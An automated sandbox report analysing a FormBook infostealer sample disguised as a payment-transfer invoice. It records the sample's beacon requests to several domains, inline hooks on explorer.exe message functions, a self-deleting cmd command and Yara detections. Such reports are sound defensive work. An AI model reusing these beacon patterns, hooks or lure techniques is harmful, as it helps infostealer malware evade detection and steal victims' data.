                                                            Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | www.soheilvaseghi.com | vaseghi.github.io |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io |  | 185.199.108.153 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io |  | 185.199.111.153 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io |  | 185.199.109.153 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io |  | 185.199.110.153 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:57.756051064 CET | 8.8.8.8 | 192.168.2.3 | 0xa100 | No error (0) | www.gannahealing.com | gannahealing.com |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:49:57.756051064 CET | 8.8.8.8 | 192.168.2.3 | 0xa100 | No error (0) | gannahealing.com |  | 176.74.27.137 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:50:18.295779943 CET | 8.8.8.8 | 192.168.2.3 | 0xf04b | No error (0) | www.olgadalila.com | olgadalila.com |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:50:18.295779943 CET | 8.8.8.8 | 192.168.2.3 | 0xf04b | No error (0) | olgadalila.com |  | 198.27.88.111 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:50:39.050357103 CET | 8.8.8.8 | 192.168.2.3 | 0xcfd4 | No error (0) | www.zomapa.com |  | 164.155.144.220 | A (IP address) | IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.kanaai.com
                                                            • www.cvmjqcid.com
                                                            • www.jaemagreci.com
                                                            • www.sweetpopntreatz.com
                                                            • www.long9000.com
                                                            • www.soheilvaseghi.com
                                                            • www.gannahealing.com
                                                            • www.olgadalila.com
                                                            • www.zomapa.com

                                                            HTTP Packets

                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            0 | 192.168.2.3 | 49726 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:47:53.367204905 CET | 1353 | OUT | GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.kanaai.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:47:53.479753971 CET | 1354 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Feb 2021 08:47:53 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            location: https://www.kanaai.com/blr?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L
                                                            strict-transport-security: max-age=120
                                                            x-wix-request-id: 1614070073.418552239871121903
                                                            Age: 0
                                                            Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                            X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRaluwwFBK7ql/Bn4PhplCINftSbYW2c4RZurCpWsQpzdtD3fKEXQvQlSAkB/lstal9R9ihGhmRXRA447Fw/kR9qdQ=,2UNV7KOq4oGjA5+PKsX47PP4j9yVJ2TZnllsg4qz4cE=,l7Ey5khejq81S7sxGe5Nk7KjdHHF98Vyi2aTDlfeOxdXz5t7NzGxeu2CXkk1aB7ZGlsroP2XR0N+rjgJK/PU9A==,4EmzKGKKpFffqfFwZRPY8dyCbNiRyM7+ZTNlULwu4/eFl6yP+RXtdTBOj4nQbF2lOOC/fp3nJ3UUnFruSOQYow==
                                                            Cache-Control: no-cache
                                                            Expires: -1
                                                            Server: Pepyaka/1.19.0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            1 | 192.168.2.3 | 49735 | 210.152.86.132 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:48:14.400055885 CET | 5114 | OUT | GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.cvmjqcid.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:14.694118977 CET | 5115 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.16.1
                                                            Date: Tue, 23 Feb 2021 08:48:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: close
                                                            Location: http://merukore.jp/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            2 | 192.168.2.3 | 49736 | 50.116.112.43 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:48:35.246251106 CET | 5116 | OUT | GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.jaemagreci.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:36.268591881 CET | 5117 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Feb 2021 08:48:35 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://jaemagreci.com
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            3 | 192.168.2.3 | 49739 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:48:54.032861948 CET | 5136 | OUT | GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.sweetpopntreatz.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:54.174190044 CET | 5137 | IN | HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Tue, 23 Feb 2021 08:48:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6031584e-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            4 | 192.168.2.3 | 49740 | 198.52.105.123 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:49:16.624357939 CET | 5138 | OUT | GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.long9000.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:16.870922089 CET | 5139 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:44:23 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-
                                                            Feb 23, 2021 09:49:16.871021032 CET | 5141 | IN |
                                                            Data Ascii: decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{
                                                            Feb 23, 2021 09:49:16.871046066 CET | 5142 | IN |
                                                            Data Ascii: ding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px; font-size:16px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-f
                                                            Feb 23, 2021 09:49:16.871067047 CET | 5143 | IN |
                                                            Data Ascii: color: #333; height: 100%; display: inline-block; border-left: 1px solid #fff; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; }
                                                            Feb 23, 2021 09:49:16.871087074 CET | 5145 | IN |
                                                            Data Ascii: color: #ccc; } .exception-var table tbody{ font-size: 13px; font-family: Consolas,"Liberation Mono",Courier,""; } .exception-var table td{ padding: 0 6px;
                                                            Feb 23, 2021 09:49:16.871104956 CET | 5145 | IN |
                                                            Data Ascii: color: #008 } /* a markup tag name */ pre.prettyprint .atn { color: #606 } /* a markup attribute name */ pre.prettyprint .atv { color: #080 } /* a markup attribute value */ pre.prettyprint .dec, pre.prettyprint .var


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            5 | 192.168.2.3 | 49748 | 185.199.108.153 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:49:37.345757961 CET | 5531 | OUT | GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.soheilvaseghi.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:37.472671032 CET | 5533 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: GitHub.com
                                                            Content-Type: text/html
                                                            Location: https://soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L
                                                            X-GitHub-Request-Id: 2C62:B000:9F860:ADCCB:6034C1A1
                                                            Content-Length: 162
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 23 Feb 2021 08:49:37 GMT
                                                            Via: 1.1 varnish
                                                            Age: 0
                                                            Connection: close
                                                            X-Served-By: cache-hhn4039-HHN
                                                            X-Cache: MISS
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1614070177.383340,VS0,VE84
                                                            Vary: Accept-Encoding
                                                            X-Fastly-Request-ID: 28473c359bf380142872393ca46bb19149a93093
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            6 | 192.168.2.3 | 49752 | 176.74.27.137 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:49:57.812186003 CET | 6008 | OUT | GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.gannahealing.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:57.873881102 CET | 6009 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:49:57 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Content-Length: 343
                                                            Connection: close
                                                            Location: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L
                                                            Cache-Control: max-age=172800
                                                            Expires: Thu, 25 Feb 2021 08:49:57 GMT
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&amp;Yn=ybdDmfdPTbAT8L">here</a>.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            7 | 192.168.2.3 | 49753 | 198.27.88.111 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:50:18.432307005 CET | 6010 | OUT | GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.olgadalila.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:50:18.584054947 CET | 6010 | IN | HTTP/1.1 502 Bad Gateway
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:50:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            8 | 192.168.2.3 | 49754 | 164.155.144.220 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:50:39.257392883 CET | 6011 | OUT | GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.zomapa.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:50:39.465549946 CET | 6011 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:50:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 1.0


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function Name | Hook Type | Active in Processes
                                                            PeekMessageA | INLINE | explorer.exe
                                                            PeekMessageW | INLINE | explorer.exe
                                                            GetMessageW | INLINE | explorer.exe
                                                            GetMessageA | INLINE | explorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: user32.dll
                                                            Function Name | Hook Type | New Data
                                                            PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                                            PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                                            GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                                            GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                                            System Behavior

                                                            General

                                                            Start time:09:46:47
                                                            Start date:23/02/2021
                                                            Path:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
                                                            Imagebase:0x7ffb73670000
                                                            File size:716288 bytes
                                                            MD5 hash:5F1C9C4A7BC24C3D39A5A3834BA7BB8E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:09:46:55
                                                            Start date:23/02/2021
                                                            Path:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Imagebase:0x7ffb73670000
                                                            File size:716288 bytes
                                                            MD5 hash:5F1C9C4A7BC24C3D39A5A3834BA7BB8E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:09:46:57
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:09:47:11
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                            Imagebase:0x330000
                                                            File size:3611360 bytes
                                                            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:09:47:15
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
                                                            Imagebase:0x1d0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:09:47:15
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                              Executed Functions

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 028D6BF8
                                                              • GetCurrentThread.KERNEL32 ref: 028D6C35
                                                              • GetCurrentProcess.KERNEL32 ref: 028D6C72
                                                              • GetCurrentThreadId.KERNEL32 ref: 028D6CCB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: a760883131c03152c03946671f984c76947d5ea4539f359061268c22d193ba21
                                                              • Instruction ID: 0af98f319b7e4a833cb301a6f96e29b18fc3e13e142745085b75e4c01938fd2a
                                                              • Opcode Fuzzy Hash: a760883131c03152c03946671f984c76947d5ea4539f359061268c22d193ba21
                                                              • Instruction Fuzzy Hash: DE5166B8D006498FEB14CFA9D6487DEBBF4FF88314F208459E019A7290E774A948CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: fa4440ce7f009f415f412dfc904fe8e52d82ecea730a7997dab364cea7d9dfb3
                                                              • Instruction ID: c3e8717bda800adb7332a8e7fa9ba71852be0a2054a1beeb00a9607ba5199a79
                                                              • Opcode Fuzzy Hash: fa4440ce7f009f415f412dfc904fe8e52d82ecea730a7997dab364cea7d9dfb3
                                                              • Instruction Fuzzy Hash: FF51F0B6D00249EFDF11CF99C880ADEBFB1BF49314F14812AE919AB220D771A845CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 7bb29cfaedaf4bd777e818a8f8d2a62b134cf9e91dcedbddf41ecf71bd1790b6
                                                              • Instruction ID: 0e1e0859a1896a867e630467b65a976fd38d8bf86e8324d13f5050b450c0bdea
                                                              • Opcode Fuzzy Hash: 7bb29cfaedaf4bd777e818a8f8d2a62b134cf9e91dcedbddf41ecf71bd1790b6
                                                              • Instruction Fuzzy Hash: 6151C1B5D003499FDF14CFA9C884ADEBBB5FF49314F24812AE819AB210D774A985CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 889352d1a59b18c4023d8b47867aea7dd564ab3932b995e68bda1466bcff9543
                                                              • Instruction ID: ed134a8f55a7a7fb59a27a7b3f6eaa8ecb73cf6d9e74124625d6ccedf5927270
                                                              • Opcode Fuzzy Hash: 889352d1a59b18c4023d8b47867aea7dd564ab3932b995e68bda1466bcff9543
                                                              • Instruction Fuzzy Hash: 0F51B0B5D003499FDF14CF99C984ADEBBB5FF88314F24812AE819AB210D774A985CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028D6E47
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028DBE89,00000800,00000000,00000000), ref: 028DC09A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 028DBE0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

